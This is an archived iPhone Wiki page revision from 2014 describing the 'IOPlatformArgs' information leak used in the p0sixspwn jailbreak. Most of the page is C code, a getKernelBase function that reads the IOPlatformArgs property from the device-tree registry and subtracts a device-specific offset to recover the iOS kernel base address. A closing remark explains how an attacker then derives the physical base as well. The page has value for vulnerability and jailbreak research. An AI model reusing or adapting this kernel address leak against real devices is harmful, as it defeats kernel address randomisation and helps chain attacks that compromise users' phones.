The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
Difference between revisions of "IOPlatfromArgs leak"
(Created page with "Vulnerability used in p0sixspwn This vulnerability leaks the kernel base address. This is the code <code> unsigned long getKernelBase() { unsigned long buf; io_...") |
(No difference)
|
Revision as of 18:13, 14 June 2014
Vulnerability used in p0sixspwn
This vulnerability leaks the kernel base address.
This is the code
unsigned long getKernelBase() {
unsigned long buf;
io_service_t service = IOServiceGetMatchingService(kIOMasterPortDefault, IOServiceNameMatching("device-tree"));
if(service)
{
CFDataRef macData = IORegistryEntryCreateCFProperty(service, CFSTR("IOPlatformArgs"), kCFAllocatorDefault, 0);
if(macData != NULL)
{
/*
void CFDataGetBytes (
CFDataRef theData,
CFRange range,
UInt8 *buffer
);
*/
CFDataGetBytes(macData, CFRangeMake(0,sizeof(buf)), &buf); // TODO: buf != UInt8
// XXX: TODO: change decrement based on device.
// N90 ONLY FOR NOW!
buf -= 0xE1C000; // Diff.
CFRelease(macData);
IOObjectRelease(service);
return buf;
}
IOObjectRelease(service);
}
return 0;
}
Once the attacker knows the virtual base, he can use the virt_to_phys
macro to see what the physical base is, this way both bases are leaked. This all relies on the IOPlatformArgs bug